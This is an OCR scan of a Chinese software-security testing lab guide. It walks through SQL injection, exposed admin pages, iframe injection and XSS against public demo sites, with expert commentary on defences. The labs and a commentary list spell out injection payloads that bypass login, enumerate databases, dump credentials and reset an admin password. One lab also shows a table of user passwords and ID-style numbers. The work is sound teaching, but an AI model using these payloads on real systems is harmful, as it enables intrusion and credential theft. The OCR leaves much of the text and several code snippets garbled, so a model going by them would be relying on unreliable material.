时 间 延 误 是 一 种 盲目 的 SQL 注入 ,根据 所 注入 的 逻辑 , 它 可 以 导致 SQL 引擎 执行 一 个 
长 队列 或 者 一 个 时 间 延 误 语 句 。 攻 击 者 可 以 衡量 页 面 加 载 的 时 间 , 从 而 决定 所 注入 的 语句 
是 否 为 真 。 

以 上 仅 是 对 SQL 注入 攻击 的 粗略 分 类 。 从 技术 上 讲 , 如 今 的 SQL 注入 攻击 者 在 如 何 
找 出 有 漏洞 的 网 站 方面 更 加 全 面 , 出 现 了 一 些 新 型 的 SQL 注入 攻击 手段 。 黑 客 可 以 使 用 各 
种 工具 加 速 漏洞 的 利用 过 程 。 我 们 不 妨 看 看 the Asprox Trojan 这 种 木马 , 它 主要 通过 一 个 
发 布 邮件 的 僵尸 网 络 来 传播 ,其 整个 工作 过 程 可 以 这 样 描述 : 首先 ,通过 受到 控制 的 主机 发 
送 的 垃圾 邮件 将 此 木马 安装 到 计算 机 中 ; 然后 ,受到 此 木马 感染 的 计算 机 会 下 载 一 段 二 进 
制 代 码 , 在 其 启动 时 , 它 会 使 用 搜索 引擎 搜索 用 微软 的 ASP 技术 建立 表单 的 有 漏洞 的 网 
站 ,搜索 的 结果 就 成 为 SQL 注入 攻击 的 靶子 清单 ; 接着 ,这 个 木马 会 向 这 些 站 点 发 动 SQL 
注入 攻击 ,使 有 些 网 站 受到 控制 和 破坏 ,访问 这 些 受 到 控制 和 破坏 的 网 站 的 用 户 将 会 受到 其 
骗 , 从 另外 一 个 站 点 下 载 一 段 恶 意 的 JavaScript 代码 ; 最 后 ,这 段 代码 将 用 户 指引 到 第 三 个 
站 点 ,这 里 有 更 多 的 恶意 软件 ,如 窃取 口令 的 木马 。 

本 例 注 入 过 程 的 工作 方式 是 提前 终止 文本 字符 串 , 然 后 追加 一 个 新 的 命令 。 由 于 插入 
的 命令 可 能 在 执行 前 追加 其 他 字符 串 , 因 此 攻击 者 用 注释 标记 -- 来 终止 注入 的 字符 囊 。 执 
行 时 ,此 后 的 文本 将 被 忽略 。 


实验 1 软件 安全 测试 训练 
AAA 


1.3 KIZ €3: testaspnet 网 站 有 SQL 注入 风险 


缺陷 标题 testaspnet 网 站 下 存在 SQL 注入 风险 。 
测试 平台 与 浏览 器 Windows XP 十 IE 8. 


测试 步骤 
(1) 打开 testaspnet 网 站 http://testaspnet. vulnweb. com, 


(2) 单 击 导航 条 上 的 login 链接 。 
(3) f£ Username 文本 框 中 输入 Try'or 1=1 or 'test' = "test, 单 击 Login 按钮 登录 ， 


如 图 1-5 所 示 。 
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图 1-5 登录 页 面 


期 望 结 果 ”登录 失败 。 
实际 结果 以 admin 身份 登录 成 功 , 如 图 1-6 所 示 。 
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26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has 
been released today. The beta is available for download at 
http://www. acunetix.com/download/. 
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21 July 2005 - Start-up company Acunetix released Acunetix Web 
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Web Vulnerability Scanner 2 crawls an entire website, launches popular web 
attacks (SQL Injection etc.) and identifies vulnerabilities that need to be 
fixed. 
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图 1-6 登录 成 功 
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N 专家 点 评 

SQL 注入 攻击 利用 的 是 数据 库 SQL 语法 ,对 SQL 语法 使 用 越 深入 ,攻击 得 到 的 信息 
就 越 多 。 常 见 的 攻击 语法 如 下 。 

(1) 获取 数据 库 版 本 。 





and (select @@version)> 0 

(2) 获取 当前 数据 库 名 。 

and db nane()» 0 

(3) 获取 当前 数据 库 用 户 名 。 

and user > 0 and user_name() = 'dbo' 

CA) 猜 解 所 有 数据 库 名 称 。 

and (select count( * ) from master. dbo. sysdatabases where name> 1 and dbid = 6) <> 0 
(5) 猜 解 表 的 字段 名 称 。 


and (Select Top 1 col_name(object_id(' 表 名 '),1) from sysobjects)> 0 

.asp?id- xx having 1-1 // X: P admin. id 就 是 一 个 表 名 admin 和 一 个 列 名 id 
.asp?id- xx group by admin. id having 1 = 1 // 可 以 得 到 列 名 

.asp?id- xx group by admin. id, admin. username having 1 = 1 // 得 到 另 一 个 列 名 


如 果 知 道 了 表 名 和 字段 名 就 可 以 得 出 准确 的 值 。 

union select 1,2, username, password, 5,6,7,8,9,10,11,12 from usertable where id- 6 
(6) 爆 账 号 。 

union select min(username),1,1,1,.. from users where username > 'a' 

CD 修改 管理 员 的 密码 为 123。 


.asp?id- X X ;update admin set password= '123' where id - 1 
.asp?id- X X ;insert into admin(asd, ..) values(123, ..) //3k fi & admin P 5 A 123 T 


(8) 猜 解 数据 库 中 用 户 名 表 的 名 称 。 


and (select count( * ) from 数据 库 .dbo. 表 名 )>0 — // 若 表 名 存在 , 则 工作 正常 ,否则 异常 


1.4 实验 #4: zero 网 站 能 获得 管理 员 身 份 


缺陷 标题 zero 网 站 在 地 址 栏 追加 admin 可 进入 管理 员 页 面 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome 45.0, 
测试 步骤 

(1) 打开 zero 网 站 http://zero. webappsecurity. com/。 

(2) 在 地 址 栏 删除 index. html, 然 后 追加 admin, 按 Enter 键 。 


实验 1 软件 安全 测试 训练 


期 望 结果 ”浏览 器 提示 无 法 找到 网 页 ,或 者 出 现 管理 员 登 录 页 面 。 
实际 结果 ” 跳 转 到 管理 员 页 面 ,并 且 能 看 到 系统 中 所 有 用 户 名 与 密码 ,结果 如 图 1-7 和 









































图 1-8 所 示 。 
Dzero-Admin-Home x 
dh q| D zero.webappsecurity.com/admin/ 
Zero Bank Me pgsindechtmEsisinaqmin 
Admin Home 
bat 管理 员 页 面 
Users 
Currencies 
图 1-7 进入 管理 员 页 面 
Users 
Name Password SSN 
Home 

Leeroy Jenkins VIZ40AWT8VL 536-48-3769 
Stephen Bowen OTZ07BXM0BE 607-58-7435 
Currencies Linus Moran FKO04SXA7TI 247-54-1719 
Nero Chan TXJ77CQO5EI 57813-3713 
Kadeem Higgins MFC500QE7VO 449-20.3206 
Quinn Burks HWZ97ZUM3NK 008-70-6738 
Davis Thompson RGD78SHB0TG 574-56-1932 
Lester Keller EIJ79NLTOTP 330-58-4012 











L8 查看 到 系统 中 所 有 用 户 名 与 密码 





x 专家 点 评 


这 是 典型 的 身份 认证 与 会 话 管理 方面 的 安全 问题 。2017 年 ,失效 的 身份 认证 排 在 全 球 
Web 安全 第 二 位 。 身 份 认证 最 常见 的 是 登录 功能 ,往往 是 提交 用 户 名 和 密码 ,在 安全 性 要 
求 更 高 的 情况 下 ,有 防止 密码 暴力 破解 的 验证 码 、 基 于 客户 端的 证 书 、 物 理 口令 卡 等 。 

HTTP 本 身 是 无 状态 的 ,利用 会 话 管理 机 制 来 实现 连接 识别 。 身 份 认证 的 结果 往往 是 
获得 一 个 令 牌 ,通常 放 在 Cookie 中 ,之 后 根据 这 个 授权 的 令 牌 对 用 户 的 身份 进行 识别 ,而 不 
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需要 每 次 都 登录 。 

用 户 身份 认证 和 会 话 管理 是 一 个 应 用 程序 中 最 关键 的 过 程 , 有 缺陷 的 设计 会 严重 破坏 
这 个 过 程 。 在 开发 Web 应 用 程序 时 ,开发 人 员 往 往 只 关注 Web 应 用 程序 所 需 的 功能 。 由 
于 这 个 原因 ,开发 人 员 通 常会 建立 自 定义 的 身份 认证 和 会 话 管理 方案 。 这 些 自 定义 的 方案 
往往 在 退出 、 密 码 管 理 . 超 时 、 记 住 我 .账户 更 新 等 方面 存在 漏洞 。 因 为 每 个 系统 实现 都 不 
同 , 业 务 定义 也 不 同 ,所 以 要 找 出 这 些 漏 洞 有 时 会 很 困难 。 

其 中 最 需要 保护 的 数据 是 认证 凭证 (credentials) 和 会 话 ID。 验 证 程序 是 否 存 在 失效 
的 认证 和 会 话 管理 ,通常 从 以 下 几 点 考虑 。 

(1) 当 存 储 认 证 凭证 时 ,是 否 总 是 使 用 hashing 或 加 密 保 护 。 

(2) 认证 凭证 是 否 可 猜测 ,或 者 能 够 通过 薄弱 的 账户 管理 功能 (例如 账户 创建 、 密 码 修 
改 、 密 码 恢复 、 弱 会 话 ID) 重 写 。 

(3) 会 话 ID 是 否 暴露 在 URL 里 (例如 URL 重 写 ) 。 

(4) 会 话 ID 是 否 容易 受到 会 话 国定 (session fixation) 的 攻击 。 

(5) 会 话 ID 会 不 会 超时 ,用 户 能 否 退 出 。 

(6) 成 功 注册 后 ,会话 ID 会 不 会 轮转 。 

(7) 密码 、 会 话 ID 和 其 他 认证 凭据 是 否 只 通过 TLS 连接 传输 。 


1.5 实验 #5: testaspnet 网 站 有 框架 钓鱼 风险 


缺陷 标题 testaspnet 网 站 一 comments 评论 区 一 评论 框 中 ,存在 框架 钓鱼 风险 。 
测试 平台 与 浏览 器 Windows 7 十 IE 9 或 Firefox, 
测试 步骤 
(1) 用 下 浏览 器 打开 testaspnet 网 站 http: //testaspnet. vulnweb. com/。 
(2) 在 主页 中 单 击 comments, 
(3) 在 comments 文本 框 中 输入 < iframe src— http: / / baidu. com >, 单 击 Send comment 
按钮 ,如 图 1-9 所 示 。 
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1-9 输入 脚本 代码 


实验 1 软件 安全 测试 训练 


(4) 查看 结果 页 面 。 
期 望 结果 ”用 户 能 够 正常 评论 ,不 存在 框架 钓鱼 风险 。 
实际 结果 “存在 框架 钓鱼 风险 ,覆盖 了 其 他 评论 ,并 且 页 面 显示 错乱 ,如 图 1-10 所 示 。 




















图 1-10 存在 框架 钓鱼 风险 


N. 专家 点 评 


为 避免 自己 的 网 页 或 网 站 被 frame 或 者 iframe 框架 (阻止 钓鱼 风险 ) ,目前 大 致 有 3 种 
1. 使 用 meta 元 标签 


<html> 





<head> 
< meta http- equiv = "Windows - Target" contect = "_top"> 
</head> 
< body></body> 
</html > 


2. 使 用 JavaScript 脚本 


function location_top(){ 
if(top. location!= self.location)( 
top. location = self. location; 
return false; 
J 
return true; 
) 
location_top(); // 调 用 


这 个 方法 用 得 比较 多 ,但 是 该 方法 已 经 有 了 破解 的 办 法 , 那 就 是 在 父 框 架 中 加 入 脚本 
var location= document. location 或 者 var location 一 ""。 记 住 , 前 台 的 验证 经 常会 被 绕 行 或 
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被 其 他 方式 取代 而 不 起 作用 。 

3. 使 用 加 固 HTTP 安全 响应 头 

这 里 介绍 的 响应 头 是 X-Frame-Options, 这 个 属性 可 以 解决 使 用 JavaScript 判断 会 被 
var location 破解 的 问题 ,IE 8、Firefox 3. 6, Chrome 4 以 上 的 版 本 均 能 很 好 地 支持 。 以 Java 
EE 软件 开发 为 例 , 补 充 Java 后 台 代 码 

//to prevent all framing of this content 

response. addHeader( "X — FRAME — OPTIONS", "DENY" ); 

//to allow framing of this content only by this site 

response. addHeader( "X — FRAME — OPTIONS", "SAMEORIGIN" ); 
就 可 以 进行 服务 器 端的 验证 (攻击 者 是 无 法 绕 过 服务 器 端 验证 的 ), 从 而 确保 网 站 不 会 被 框 
架 钓 鱼 利用 。 此 种 解决 方法 是 目前 最 为 安全 的 解决 方案 。 


1.6 实验 #6: testasp 网 站 有 框架 钓鱼 风险 


缺陷 标题 ”在 testasp 网 站 查询 时 存在 框架 钓鱼 风险 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 十 Firefox 十 IE 11, 
测试 步骤 
(1) 打开 testasp 网 站 http://testasp. vulnweb. com。 
(2) 单 击 search。 
(3) 在 文本 框 中 输入 < iframe src= http: //baidu. com >, 单 击 search posts 按钮 ,如 
图 1-11 所 示 。 


< O 


| yocunetix ECL 


[ about - forums - search - login - register 
































pomme 
— input: 


«iframe src=http'//taidu. con» 





111 输入 框架 攻击 


期 望 结 果 页面 显 示警 告 信息 。 
实际 结果 ”页 面 成 功 通过 框架 钓鱼 ,出 现 百 度 搜索 网 站 的 内 容 ,如 图 1-12 所 示 。 


DD 专家 点 评 


Web 应 用 程序 的 安全 始终 是 一 个 重要 的 议题 ,因为 网 站 是 恶意 攻击 者 的 第 一 目标 。 黑 
客 利用 网 站 来 传播 恶意 软件 、 蠕 虫 、 垃 圾 邮件 等 。OWASP( 开 放 式 Web 应 用 程序 安全 项 





实验 1 软件 安全 测试 训练 、 15 
AA 






































1-12 网 站 框架 上 百度 


目 ) 概 括 了 Web 应 用 程序 中 最 具 危 险 的 安全 漏洞 ,但 是 仍 在 不 断 积极 地 发 现 可 能 出 现 的 新 
的 弱点 以 及 新 的 Web 攻击 手段 。 黑 客 总 是 在 不 断 寻找 新 的 方法 欺骗 用 户 , 因 此 从 渗透 测试 
的 角度 来 看 ,需要 看 到 每 个 可 能 被 利用 来 入 侵 的 漏洞 和 弱点 。 
HTML 代码 中 的 iframe 是 可 用 于 在 HTML 页 面 中 嵌入 一 些 文件 (如 文档 ,视频 等 ) 的 技 
术 。 对 iframe 最 简单 的 解释 就 是 ,iframe 是 一 个 可 以 在 当前 页 面 中 显示 其 他 页 面 内 容 的 技术 。 
iframe 的 安全 也 是 一 个 重要 的 议题 。iframe 的 用 法 很 常见 ,许多 知名 的 社交 网 站 都 会 
使 用 它 。 使 用 iframe 的 方法 如 下 。 


< iframe src = "http://www. 2cto. com"></ iframe > 
该 例 说 明 在 当前 网 页 中 显示 其 他 站 点 。 


< iframe src = 'http: //www. 2cto. com /' width = '500' height = '600' style = 'visibility: hidden; ></ 

iframe> 

该 例 iframe 定义 了 宽度 和 高 度 , 但 是 框架 可 见 度 被 隐藏 了 ,所 以 不 能 显示 。 由 于 这 两 
个 属性 占用 面积 ,所 以 一 般 情况 下 攻击 者 不 使 用 它 。 

现在 , 它 完全 可 以 从 用 户 的 视线 中 隐藏 了 ,但 是 iframe 仍然 能 够 正常 运行 。 在 同一 个 
浏览 器 内 ,显示 的 内 容 是 共享 session( 会 话 控制 ) 的 ,所 以 在 一 个 网 站 中 已 经 认证 的 身份 信 
息 , 在 另 一 个 钓鱼 网 站 能 够 轻易 获得 。 


1.7 实验 #7; webscantest 网 站 有 框架 钓鱼 风险 


缺陷 标题 webscantest 网 站 中 Search by name 域 存在 框架 钓鱼 危险 。 
测试 平台 与 浏览 器 ”Windows 7 十 Firefox 或 Chrome, 
测试 步骤 


(1) 打开 webscantest 网 站 http://www. webscantest. com。 
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(2) 单 击 页 面 右 下 方 链接 Browser Cache Tests, 如 图 1-13 所 示 。 


Web Scanner Test Site 





CSRF tests 
CORS tests 
JS test 


Basic test 


Piek a category 


(Eee Ge Te 


—— 








图 1-13 单 击 Browser Cache Tests 链接 


(3) 在 Search by name 域 中 输入 < iframe src — http://www. webscantest. com/ 
infodb/index. php > 
(4) 单 击 * 提 交 ” 按 钮 
(5) 观察 页 面 元 素 
期 望 结果 不 存在 框架 钓鱼 风险 
实际 结果 ”存在 框架 钓鱼 风险 ,如 图 1-14 所 示 





webscantest.com, 


Web Scanner Test Site 


Scanner 








图 1-14 存在 框架 钓鱼 风险 


实验 1 软件 安全 测试 训练 


多 入 专家 点 评 


一 些 安全 要 求 较 高 的 网 站 ,往往 不 希望 自己 的 网 页 被 另外 的 非 授权 网 站 框架 包含 ,因为 
这 往往 是 危险 的 ,然而 不 法 分 子 总 是 想 尽 办 法 以 “钓鱼 ”的 方式 御 利 。 常 见 钓鱼 方式 如 下 。 

COD 黑客 通过 钓鱼 网 站 设 下 陷阱 ,大 量 收集 用 户 个 人 隐私 信息 ,然后 贩卖 个 人 信息 或 敲 
诈 用 户 。 

(2) 黑客 通过 钓鱼 网 站 收集 .记录 用 户 网 上 银行 账号 、 密 码 , 盗 取 用 户 的 网 银 资金 。 

(3) 黑客 假冒 网 上 购物 、 在 线 支付 网 站 ,欺骗 用 户 直 接 将 钱 打 入 黑客 账户 。 

(4) 通过 假冒 产品 和 广告 宣传 获取 用 户 信任 ,骗取 用 户 人 金钱 。 

G) 恶意 团购 网 站 或 购物 网 站 假借 * 限 时 抢购 交 秒 杀 扩 团购 ”等 嗪 头 , 让 用 户 提供 个 人 信 
息 和 银行 账号 ,这 些 网 站 主 可 直接 获取 用 户 输 入 的 个 人 资料 .网银 账 号 和 密码 信息 ,进而 获 利 。 

钓鱼 网 站 主要 有 两 种 。 一 种 是 主动 的 钓鱼 网 站 , 即 高 仿 网 站 ,专门 用 于 钓鱼 。 例 如 ,中 
国 工商 银行 的 官网 是 www. icbc. com, 钓 鱼网 站 可 能 仅 修改 部 分 字符 ,例如 修改 为 www. 
lcbc. com。 从 表面 上 看 ,钓鱼 网 站 的 内 容 与 官网 几乎 完全 一 样 ,甚至 弹出 来 的 公告 都 和 常见 
的 页 面 高 度 类 似 。 这 样 当 用户 在 钓鱼 网 站 用 银行 账户 与 密码 登录 后 ,银行 账号 与 密码 就 存 
储 到 钓鱼 网 站 数据 库 了 ,用 户 的 银行 账号 就 不 再 安全 。 另 一 种 是 网 站 本 身 不 是 专门 的 钓鱼 
网 站 ,但 由 于 被 其 他 网 站 利用 ,成 了 钓鱼 网 站 。 一 个 网 站 如 果 能 被 框架 ,就 有 被 别人 网 站 钓 
鱼 的 风险 。 现 在 许多 钓鱼 攻击 是 合法 网 站 被 不 法 分 子 利用 的 情况 。 


1.8 ”实验 #8: crackme 网 站 有 框架 钓鱼 风险 


缺陷 标题 crackme 网 站 登录 界面 的 表单 隐藏 域 hUserType 存在 框架 钓鱼 风险 。 
测试 平台 与 浏览 器 ”Windows 10 十 Firefox 49. 0. 2。 
测试 步骤 
(1) 打开 crackme 网 站 http: //crackme. cenzic. com/ 。 
(2) 单 击 Login, 如 图 1-15 所 示 。 
24D S60 #60 EEG) SEG) IA) WU) 
CrackMeBankinvestmens X [i] firefox PRE x|4 


kelev/view/home.php ”打开 网 站 
















y Loans 





? Net Banking 
> Credit Cards "X 
»owmerrdmo 。 单 击 Login 
? Contact Us 
? Bills Online. 
> Not a Membej 


[ruan 








图 1-15 Mi Login 
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at 


(3) 输入 无 效 的 登录 信息 .例如 user ID X a. password 为 a。 
(4) 打开 Firefox 的 Tamper Data 工具 , 单 击 Start Tamper, 单 击 Login, 如 图 1-16 



























































所 示 。 
Login x 

所 | © | crackme.cenzic.com/kelev/php/login.php gi c Qms-ck * 

B RR) D AWIE @ 新 手 上 路 LO Ramt I] es @ Tamper Data - Ongoing requests 
e ar] Start Tamper | Stop Tamper Clear 

Welcome to CrackMeBank Investments = 
|» nome. Welcome to CrackMeBank Investments Customer Login || ^] oo" Toad 本 
|» Loans. m Enter your user 10| [x 
|^ Net Banking. 国 Enter your password |° 
|? Credit Cards. — 

Cei Login A 3. 单 击 Start Tamper 

prep 1. 输入 登录 信息 

Online Trading 
? Register 4. 单 击 Login 
| Login. 

136 输入 数据 


(5) Tamper Data 弹出 Tamper with request 对 话 框 ,不 勾 选 Continue Tampering , Jf. 
ili Tamper 按钮 ,如 图 1-17 所 示 。 





@ Tamper Data - Ongoing requests 
Start Tamper Stop Tamper Clear 

Filter 
Time Duration Total Duration Size .. .. — URL 























Jf H Tamper 











1-17 Tamper 设置 与 选择 


(6) 弹出 Tamper Popup 对 话 框 ,在 hLoginType 域 中 填写 ">< iframe src = http: 
// www. gzpyp. edu. cn>, 如 图 1-18 所 示 。 
(7) 单 击 “ 确 定 ” 按 钮 。 
期 望 结果 不 存在 框架 钓鱼 风险 。 
实际 结果 ”存在 框架 钓鱼 风险 ,结果 如 图 1-19 所 示 。 


实验 1 ”软件 安全 测试 训练 NA 




































































输入 "> «iframe src-http://WWw.gzpyp.edu.cn» 









































1-18 输入 钓鱼 攻击 代码 段 
XE) SAO 查看 (V) HLO 书签 (B) IAD 帮助 (H) 
Login BC 





€ © crackme.cenzic.com/kelev/php/login.php. g 
B arva D xuma @ 新 手 上 中 D emt 加 mamat 








> Credit Cards 
Contact Us 

















Bills online 
Online Trading 
> Register 
a 存在 框架 钓鱼 风险 
图 1-19 网 站 存在 框架 钓鱼 风险 
M. 专家 点 评 





本 例 详细 讲解 如 何 利 用 Firefox 中 的 Tamper Data 1 R. X 7k E& 3 3& + š£ p 85 dc 3E ut 4+ 
钓鱼 攻击 。 在 实际 的 攻击 测试 中 ,每 种 输入 都 有 可 能 被 利用 进行 攻击 ,即使 页 面 看 不 到 的 隐 
藏 域 也 是 如 此 。 这 要 求 开发 者 一 定 要 做 所 有 数据 的 输入 有 效 性 检验 ,否则 就 会 使 网 站 处 于 


20 


`Ë 


软件 测试 实验 实 训 指南 


危险 之 中 。 

互联 网 活跃 的 钓鱼 网 站 传播 途径 主要 有 以 下 8 种 。 

(D 通过 QQ、MSN、 阿 里 旺旺 等 客户 端 聊天 工具 发 送 传播 钓鱼 网 站 链接 。 

(2) 在 搜索 引擎 、 中 小 网 站 投放 广告 ,吸引 用 户 单 击 钓鱼 网 站 链接 ,此 种 手段 常 被 假 医 
药 网 站 、 假 机 票 网 站 使 用 。 

(3) 通过 E-mail、 论坛 .博客 ,SNS 网 站 批量 发 布 钓鱼 网 站 链接 。 

(4) 38 id CHE Twitter 中 的 短 链 接 散 布 钓 鱼网 站 链接 。 

(5) 通过 仿冒 邮件 (例如 冒充 “银行 密码 重 置 邮件 ”) 欺 骗 用 户 进 入 钓鱼 网 站 。 

(6) 感染 病毒 后 弹出 模仿 QQ、 阿 里 旺旺 等 聊天 窗口 ,用 户 单 击 后 进入 钓鱼 网 站 。 

(7) 恶意 导航 网 站 、 恶 意 下 载 网 站 弹出 仿真 悬浮 窗口 ,用 户 单 击 后 进入 钓鱼 网 站 。 

(8) 伪装 成 用 户 输 入 网 址 时 易 发 生 的 错误 ,如 gogle. com,sinz. com 等 ,一 旦 用 户 写 
错 , 就 误 入 钓鱼 网 站 。 

如 果 网 站 开发 人 员 不 懂得 Web 安全 常识 ,那么 许多 网 站 都 可 能 成 为 一 个 潜在 的 钓鱼 网 
站 (被 钓鱼 网 站 iframe 注入 利用 ) 。 


1.9 KZ H9: testfire 网 站 有 XSS 攻击 风险 


缺陷 标题 testfire 首页 一 搜索 框 存在 XSS 攻击 风险 。 
测试 平台 与 浏览 器 Windows 7(64 bit) 十 IE 11。 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net; 
(2) 在 搜索 框 输入 < script > alert("test")</script >, 
G) 单 击 Go 按钮 进行 搜索 。 
期 望 结果 返回 正常 ,无 弹出 对 话 框 。 
实际 结果 ”弹出 KSS 攻击 成 功 对 话 框 ,显示 test 信息 ,如 图 1-20 所 示 。 
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1-20 iH KSS 攻击 成 功 对 话 框 


实验 1 软件 安全 测试 训练 


- 专家 点 评 


XSS 是 一 种 经 常 出 现在 Web 应 用 中 的 计算 机 安全 漏洞 , 它 允 许 恶 意 Web 用 户 将 代码 
植 入 提供 给 其 他 用 户 使 用 的 页 面 中 。 这 些 代 码 包 括 HTML 代码 和 客户 端 脚本 。 

在 2007 年 OWASP 所 统计 的 所 有 安全 威胁 中 , 跨 站 脚本 攻击 占 22%, 高 居所 有 Web 
威胁 之 首 。2013 年 ,XSS 攻击 排名 第 三 。 

XSS 攻击 的 危害 包括 以 下 几 方 面 。 

CD 盗 取 各 类 用 户 账号 ,如 机 器 登录 账号 用 户 网 银 账 号 、 各 类 管理 员 账 号 。 

(2) 控制 企业 数据 ,包括 读 取 、 莹 改 . 添 加 删除 企业 敏感 数据 。 

(3) 和 盗窃 企业 重要 的 具有 商业 价值 的 资料 。 

(4) 非法 转账 。 

(5) 强制 发 送 电 子 邮件 。 

(6) 网 站 挂 马 。 

(7) 控制 受害 者 机 器 向 其 他 网 站 发 起 攻击 。 

用 户 在 浏览 网 站 、 使 用 即时 通信 软件 、 阅 读 电 子 邮 件 时 ,通常 会 单 击 其 中 的 链接 。 攻 击 
者 通过 在 链接 中 插入 恶意 代码 ,就 能 够 盗 取 用 户 信息 。 攻 击 者 通常 会 用 十 六 进 制 (或 其 他 编 
码 方式 ) 将 链接 编码 ,以 免 用 户 怀疑 它 的 合法 性 。 网 站 在 接收 到 包含 恶意 代码 的 请 求 之 后 会 
产生 一 个 包含 恶意 代码 的 页 面 ,而 这 个 页 面 和 那个 网 站 应 当 生 成 的 合法 页 面 高 度 类 似 。 许 
多 流行 的 留言 本 和 论坛 程序 允许 用 户 发 表 包 含 HTML 和 JavaScript 的 帖子 。 假 设 用 户 甲 
发 表 了 一 篇 包含 恶意 脚本 的 帖子 ,那么 用 户 乙 在 浏览 这 篇 帖子 时 ,恶意 脚本 就 会 执行 , 盗 取 
用 户 乙 的 session 信息 。 

为 了 搜集 用 户 信息 ,攻击 者 通常 会 在 有 漏洞 的 程序 中 插入 JavaScript, VBScript, 
ActiveX 或 Flash 以 欺骗 用 户 。 一 旦 得 手 ,他 们 可 以 盗 取 用 户 账户 、 修 改 用 户 设置 、 盗 取 / 污 
$ Cookie、 做 虚假 广告 等 。 每 天 都 有 大 量 的 KSS 攻击 的 恶意 代码 出 现 。 

随 着 AJAX(Asynchronous JavaScript and XML ,异步 JavaScript 和 XML) 技 术 的 普遍 
应 用 ,XSS 的 攻击 危害 将 被 放大 。 使 用 AJAX 的 最 大 优点 是 可 以 不 用 更 新 整个 页 面 来 维护 
数据 ,Web 应 用 可 以 更 迅速 地 响应 用 户 请 求 。AJAX 会 处 理 来 自 Web 服务 器 及 源 自 第 三 方 
的 丰富 信息 ,为 XSS 攻击 提供 了 良好 的 机 会 。AJAX 应 用 架构 会 泄露 更 多 应 用 的 细节 ,如 
函数 和 变量 名 称 、 函 数 参 数 及 返回 类 型 数据 类 型 及 有 效 范 围 等 。AJAX 应 用 架构 还 有 着 比 
传统 架构 更 多 的 应 用 输入 ,这 也 增加 了 可 被 攻击 的 点 。 


1.10 XIA #10: testasp 网 站 有 XSS 攻击 风险 


缺陷 标题 testasp 网 站 首页 -search 页 面 >search posts 框 中 存在 XSS 攻击 风险 。 
测试 平台 与 浏览 器 Windows 7(64 bit) 十 IE 11。 
测试 步骤 
(1) 打开 testasp 网 站 http: / /testasp. vulnweb. com. 
(2) 单 击 导 航 条 上 的 search 链接 。 
(3) 在 search posts 左 侧 文本 框 中 输入 < script > alert("test")</script>, 单 击 search 
posts 按钮 查找 。 
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期 望 结果 不 存在 XSS 攻击 风险 。 
实际 结果 ”存在 XSS 攻击 风险 ,弹出 XSS 攻击 成 功 对 话 框 ,如 图 1-21 所 示 。 
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图 1-21 XSS 攻击 成 功 对 话 框 


x5 专家 点 评 


现在 的 网 站 大 多 包含 大 量 的 动态 内 容 以 提升 用 户 体验 ,Web 应 用 程序 能 够 显示 与 用 户 
输入 相应 的 内 容 。 例 如 ,有 人 喜欢 写 博客 ,有 人 喜欢 在 论坛 中 回帖 ,有 人 喜欢 聊天 …… 动态 
站 点 会 受到 一 种 名 为 “ 跨 站 脚本 攻击 ”[Cross Site Scripting, 安 全 专家 们 通常 将 其 缩写 成 
XSS ,原本 应 当 是 CSS, 但 为 了 和 层 登 样式 表 (Cascading Style Sheet,CSS) 有 所 区 分 , 故 称 
XSS] 的 威胁 ; 静态 站 点 因为 只 能 看 ,不 能 修改 ,所 以 完全 不 受 其 影响 。 

动态 网 站 网 页 文件 的 扩展 名 一 般 为 ASP.JSP.PHP 等 ,要 运行 动态 网 页 还 需要 配套 的 
服务 器 环境 ; 静态 网 页 的 扩展 名 一 般 为 HTML、SHTML 等 ,只 要 用 普通 的 浏览 器 打开 就 
能 解析 执行 。 

(1) 从 网 站 开发 者 角度 ,如 何 防 护 XSS 攻击 。 

X 8 OWASP 的 建议 ,对 XSS 最 佳 的 防护 应 该 结合 两 种 方法 : 验证 所 有 输入 数据 ,有 
效 检测 攻击 ; 对 所 有 输出 数据 进行 适当 的 编码 ,以 防止 任何 已 成 功 注 入 的 脚本 在 浏览 器 端 
运行 。 具 体 如 下 。 

输入 验证 : 某 个 数据 被 接受 为 可 被 显示 或 存储 之 前 ,使 用 标准 输入 验证 机 制 , 验 证 所 有 
输入 数据 的 长 度 、 类 型 .语法 以 及 业务 规则 。 

输出 编码 : 数据 输出 前 ,确保 用 户 提交 的 数据 已 被 正确 进行 entity 编码 ,建议 对 所 有 字 
符 进行 编码 而 不 仅 局 限于 某 个 子 集 。 

明确 指定 输出 的 编码 方式 : 不 要 允许 攻击 者 为 用 户 选 择 编码 方式 (如 ISO 8859-1 或 
UTF 8) 。 

注意 黑 名 单 验证 方式 的 局 限 性 : 仅仅 查找 或 替换 一 些 字符 (如 "<"”">" 或 类 似 "script" 
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的 关键 字 ) ,很 容易 被 XSS 变种 攻击 绕 过 验证 机 制 。 

警惕 规范 化 错误 : 验证 输入 之 前 ,必须 进行 解码 及 规范 化 ,以 符合 应 用 程序 当前 的 内 部 
表示 方法 。 请 确定 应 用 程序 对 同一 输入 不 做 两 次 解码 。 

(2) 从 网 站 用 户 角度 ,如 何 防 护 XSS 攻击 。 

当 打 开 一 封 E-mail 或 附件 、 浏 览 论坛 帖子 时 ,恶意 脚本 可 能 会 自动 执行 ,因此 在 做 这 些 
操作 时 一 定 要 特别 谨慎 。 建 议 在 浏览 器 设置 中 关闭 JavaScript。 如 果 使 用 IE 浏览 器 ,建议 
将 安全 级 别 设置 为 “高 ”。 


1.11 实验 #11: webscantest 网 站 有 XSS 攻击 风险 


缺陷 标题 webscantest 网 站 的 search 域 存在 XSS 攻击 风险 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 浏览 器 。 
测试 步骤 
(1) 打开 webscantest 网 站 http://www. webscantest. com, 
(2) 单 击 页 面 右 下 方 的 Browser Cache Tests 链接 。 
(3) 在 search 域 中 输入 < script > alert(" 徐 晓 玲 ")</script >, 
CD. Si te Ho 
(5) 观察 页 面 元 素 。 
期 望 结果 不 响应 脚本 信息 。 
实际 结果 浏览 器 响应 脚本 信息 ,弹出 KSS 攻击 成 功 对 话 框 ,显示 * 徐 晓 玲 ”, 如 图 1-22 
所 示 。 





EJ wn webrcantest com/iniodb/ scorch by name pho UE x] zc * 8 4 





图 1-22 XSS 攻击 成 功 对 话 框 


No) ERAF 
测试 工程 师 常用 的 KSS 攻击 语句 及 变种 如 下 (许多 场合 都 能 攻击)。 


< script» alert('XSS')«/script» // 经 典 语句 

>"'>< img src = "javascript. :alert('XSS')"» 

